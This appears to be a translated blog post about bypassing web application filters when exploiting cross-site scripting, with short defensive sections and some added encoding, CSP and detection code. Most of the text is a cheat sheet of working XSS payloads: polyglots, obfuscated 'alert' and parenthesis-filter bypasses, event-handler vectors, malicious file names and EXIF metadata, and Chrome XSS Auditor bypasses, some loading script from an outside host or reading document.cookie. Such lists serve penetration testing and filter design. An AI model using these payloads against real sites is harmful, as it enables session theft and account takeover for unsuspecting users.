
Methods for bypassing web application security tools when exploiting XSS vectors



Despite the large number of recommendations for protecting web applications from client-side attacks such as XSS (cross-site scripting), many developers ignore them or do not follow them fully. This article looks at ways of bypassing filtering tools when exploiting XSS vectors.


There are now quite a few ways to prevent XSS vulnerabilities, including the defenses built into modern browsers that try to stop malicious code from running against the user. Nevertheless, XSS has been firmly in the top three of the OWASP Top 10 for years. XSS vulnerabilities are found on obscure projects and large ones alike: for example, a selection of recently disclosed public HackerOne reports shows that the lion's share of them are XSS. The same applies to widely used CMSs: the latest WordPress version at the time of writing, 4.7.3, closes several XSS vulnerabilities.


Protection


Basic preventive measures:



In practice, this should be implemented as:



Do not place untrusted data in any of the following locations:

Directly inside a script: <script>...XSS...</script>
Inside an HTML comment: <!--...XSS...-->
In an attribute name: <div ...XSS...=test />
In a tag name: <...XSS... href="/test" />
Directly inside CSS: <style>...XSS...</style>

Do not insert untrusted data directly into HTML element content:

<body> ...XSS... </body>
<div> ...XSS... </div>

Escape these characters as HTML entities before output:

& --> &amp;
< --> &lt;
> --> &gt;
" --> &quot;
' --> &#x27; (&apos; is not recommended)
/ --> &#x2F;
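The entity transformation above, written out as an added example (it is not code from the original post). HTML_ENTITY_MAP is the table from the text; the attribute encoder and the renderComment template are assumptions added here to show that the same untrusted value needs a different encoding depending on the context it lands in.

```javascript
// Added example (not from the original post): the entity transformation above,
// applied per output context. HTML_ENTITY_MAP follows the table in the text.
const HTML_ENTITY_MAP = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Element content: the six characters from the table are enough, because text
// between tags can only become markup if a new tag or entity is started.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITY_MAP[ch]);
}

// Attribute values: encode every non-alphanumeric code point, so that even an
// unquoted attribute cannot be terminated by a space, '=' or '/'
// (compare the "onmouseover=alert(1)// style payloads later in the article).
function encodeForHtmlAttribute(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/gu, (ch) =>
    '&#x' + ch.codePointAt(0).toString(16).toUpperCase() + ';');
}

// Hypothetical template (assumption): renders a comment with the author in an
// attribute and the text as element content, each escaped for its own context.
function renderComment(author, text) {
  return '<div class="comment" data-author="' + encodeForHtmlAttribute(author) + '">'
    + encodeForHtml(text) + '</div>';
}

// Constructed inputs, using payload shapes that appear in this article.
console.log(renderComment('"onmouseover=alert(1)//', '<svg onload=alert`1`>'));
```

The output contains no live tag or handler: both payloads survive only as inert text.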

There are many methods of protection, but one of the most effective is the use of Content Security Policy.


Content Security Policy


Previously, one of the main principles of browser security was the Same Origin Policy. Its essence is checking the three components that make up an origin: scheme, host, and port. However, once an attacker manages to inject a payload into a site, SOP is useless for that site, because the injected script runs in its origin. Therefore, CSP came to replace SOP; its main purpose is to protect the user from cross-site scripting threats. CSP describes trusted sources for loading resources and sets rules for the use of inline styles, inline scripts, and dynamic JavaScript evaluation. Most importantly, loading resources from sources that are not on the whitelist is blocked.
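How such a whitelist is expressed and enforced, as an added example that is not part of the original post. The policy object, the host https://cdn.example.com and the page origin are constructed assumptions; the resolution rules (script-src falling back to default-src, 'self', 'none', and inline script needing 'unsafe-inline') are standard CSP behaviour, simplified to host-only sources.

```javascript
// Added example (not from the original post): a CSP allow-list and a simplified
// check of what it permits. Host values below are constructed for illustration.
const policy = {
  'default-src': ["'self'"],
  'script-src': ["'self'", 'https://cdn.example.com'],
  'style-src': ["'self'"],
  'object-src': ["'none'"],
  'base-uri': ["'self'"],
};

// Serialise the directive map into a Content-Security-Policy header value.
function buildCspHeader(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => name + ' ' + sources.join(' '))
    .join('; ');
}

// Sources that govern scripts: script-src, else default-src, else nothing.
function scriptSources(directives) {
  return directives['script-src'] || directives['default-src'] || [];
}

// Would an external script at `url`, loaded by a page at `pageOrigin`, be
// allowed? Simplification: only 'self', 'none' and exact host sources are
// modelled (no wildcards, scheme-only sources, nonces or hashes).
function scriptAllowed(directives, pageOrigin, url) {
  const sources = scriptSources(directives);
  if (sources.includes("'none'")) return false;
  const origin = new URL(url).origin;            // 'null' for javascript: URLs
  return sources.some((src) =>
    src === "'self'" ? origin === pageOrigin : src === origin);
}

// Inline handlers such as <svg onload=alert(1)> and javascript: URLs are
// refused unless 'unsafe-inline' is listed, whatever hosts are whitelisted.
function inlineScriptAllowed(directives) {
  return scriptSources(directives).includes("'unsafe-inline'");
}

console.log('Content-Security-Policy: ' + buildCspHeader(policy));
```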


Supported directives:



Identify XSS vulnerabilities


XSS locators, or probes, can be used to check for vulnerabilities.

The simplest probe:


 '';!--"<XSS>=&{()} 

Simplest JavaScript XSS:


 <SCRIPT SRC=http://xss/xss.js></SCRIPT> 

An example of a combined (polyglot) payload intended to get past possible filtering:


 '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'"> 

JavaScript directive:


 <IMG SRC="javascript:alert('XSS');"> 

Case-variation vector:


 <IMG SRC=JaVaScRiPt:alert('XSS')> 

Event handlers that can carry XSS payloads:


 FSCommand onAbort onActivate onAfterPrint onAfterUpdate onBeforeActivate onBeforeCopy onBeforeCut onBeforeDeactivate onBeforeEditFocus onBeforePaste onBeforePrint onBeforeUnload onBeforeUpdate onBegin onBlur onBounce onCellChange onChange onClick onContextMenu onControlSelect onCopy onCut onDataAvailable onDataSetChanged onDataSetComplete onDblClick onDeactivate onDrag onDragEnd onDragLeave onDragEnter onDragOver onDragDrop onDragStart onDrop onEnd onError onErrorUpdate onFilterChange onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver onMouseUp onMouseWheel onMove onMoveEnd onMoveStart onOffline onOnline onOutOfSync onPaste onPause onPopState onProgress onPropertyChange onReadyStateChange onRedo onRepeat onReset onResize onResizeEnd onResizeStart onResume onReverse onRowsEnter onRowExit onRowDelete onRowInserted onScroll onSeek onSelect onSelectionChange onSelectStart onStart onStop onStorage onSyncRestored onSubmit onTimeError onTrackChange onUndo onUnload onURLFlip seekSegmentTime 

Examples of XSS payloads for filtering bypass


Injecting a tag:


 <svg onload=alert(1)> "><svg onload=alert(1)// 

Inline (attribute) payload:


 "onmouseover=alert(1)// "autofocus/onfocus=alert(1)// 

JavaScript-context payloads:


 '-alert(1)-' '-alert(1)// \'-alert(1)// 

JavaScript context, closing the script tag:


 </script><svg onload=alert(1)> 

Injection via PHP_SELF:


 http://DOMAIN/PAGE.php/"><svg onload=alert(1)> 

Bypassing parenthesis filtering:


 <svg onload=alert`1`> <svg onload=alert&lpar;1&rpar;> <svg onload=alert&#x28;1&#x29> <svg onload=alert&#40;1&#41> 

Bypassing the "alert" filter:


 (alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) 
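The parenthesis and "alert" bypasses above work against filters that match the raw request. Below is an added detection example (not from the original post) that normalises a query value first, decoding URL encoding and the HTML entities used in this article (&lpar;, &rpar;, &#x28;, &#40;, &sol;, &comma;, &num;, &equals;), and only then looks for structural signs of a payload: a tag opener, an inline event handler, a javascript: URL, or a backtick call like alert`1`. The sample values, the indicator names and the regexes are constructed assumptions; the named-entity table is deliberately short.

```javascript
// Added example (not from the original post): normalise before matching, so
// the entity/URL-encoded variants shown in this article are not missed.
// Named entities are limited to the ones used on this page (assumption).
const NAMED_ENTITIES = {
  lt: '<', gt: '>', quot: '"', apos: "'", amp: '&', lpar: '(', rpar: ')',
  sol: '/', comma: ',', num: '#', equals: '=',
};

// Decode &name;, &#NNN; and &#xHH; (the trailing ';' is optional, as browsers
// tolerate, which is why alert&#x28;1&#x29> above still executes).
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const code = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// URL-decode (keeping the raw value on malformed %-sequences), then entity-decode,
// then lowercase so that JaVaScRiPt-style case variation is irrelevant.
function normalise(value) {
  let v = value;
  try { v = decodeURIComponent(v.replace(/\+/g, ' ')); } catch (e) { /* keep raw */ }
  return decodeEntities(v).toLowerCase();
}

// Structural indicators, independent of the function name the payload calls.
const XSS_INDICATORS = [
  ['tag-opener', /<\s*[a-z!\/]/],
  ['event-handler', /[\s"'\/<]on[a-z]+\s*=/],   // ' onload=', '"onfocus=', '/onfocus='
  ['javascript-url', /javascript\s*:/],
  ['template-call', /[a-z_$][\w$]*\s*`/],       // alert`1`
];

// Returns the names of the indicators that fire for one raw query value.
function xssIndicators(rawValue) {
  const n = normalise(rawValue);
  return XSS_INDICATORS.filter(([, re]) => re.test(n)).map(([name]) => name);
}

// Constructed sample values, as they would appear in a raw access log.
console.log(xssIndicators('%3Csvg%20onload%3Dalert%26lpar%3B1%26rpar%3B%3E'));
console.log(xssIndicators('online+banking+rates%3F'));
```

This is an indicator for triage, not a filter: the `top["al"+"ert"]` style payloads above show why a detector should flag structure rather than the word alert.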

Body tag:


 <body onload=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x <body onscroll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body onresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) 

Rarely used tags:


 <marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src onloadstart=alert(1)> <video onloadstart=alert(1)><source> <input autofocus onblur=alert(1)> <keygen autofocus onfocus=alert(1)> <form onsubmit=alert(1)><input type=submit> <select onchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x onshow=alert(1)>right click me! 

Event Handlers:


 <x contenteditable onblur=alert(1)>lose focus! <x onclick=alert(1)>click this! <x oncopy=alert(1)>copy this! <x oncontextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x ondblclick=alert(1)>double click this! <x ondrag=alert(1)>drag this! <x contenteditable onfocus=alert(1)>focus this! <x contenteditable oninput=alert(1)>input here! <x contenteditable onkeydown=alert(1)>press any key! <x contenteditable onkeypress=alert(1)>press any key! <x contenteditable onkeyup=alert(1)>press any key! <x onmousedown=alert(1)>click this! <x onmousemove=alert(1)>hover this! <x onmouseout=alert(1)>hover this! <x onmouseover=alert(1)>hover this! <x onmouseup=alert(1)>click this! <x contenteditable onpaste=alert(1)>paste here! 

Direct execution:


 <script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click $<!-- math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> <svg><script xlink:href=data:,alert(1) /> $<!-- math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> 

Mobile event handlers:


 <html ontouchstart=alert(1)> <html ontouchend=alert(1)> <html ontouchmove=alert(1)> <html ontouchcancel=alert(1)> <body onorientationchange=alert(1)> 

File uploads:


File name: "><img src=1 onerror=alert(1)>.gif
Metadata (EXIF): $ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
SVG: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF: GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Bypass Google Chrome XSS Auditor (up to version 51):


 <script src="data:&comma;alert(1)// "><script src=data:&comma;alert(1)// <script src="//brutelogic.com.br&sol;1.js&num; "><script src=//brutelogic.com.br&sol;1.js&num; <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 

Conclusion


Adhere to the rule: all input is evil until proven otherwise.
Validate incoming data.
Validate the output as well.
Use comprehensive tools to protect web applications from attacks.



Source: https://habr.com/ru/post/326722/

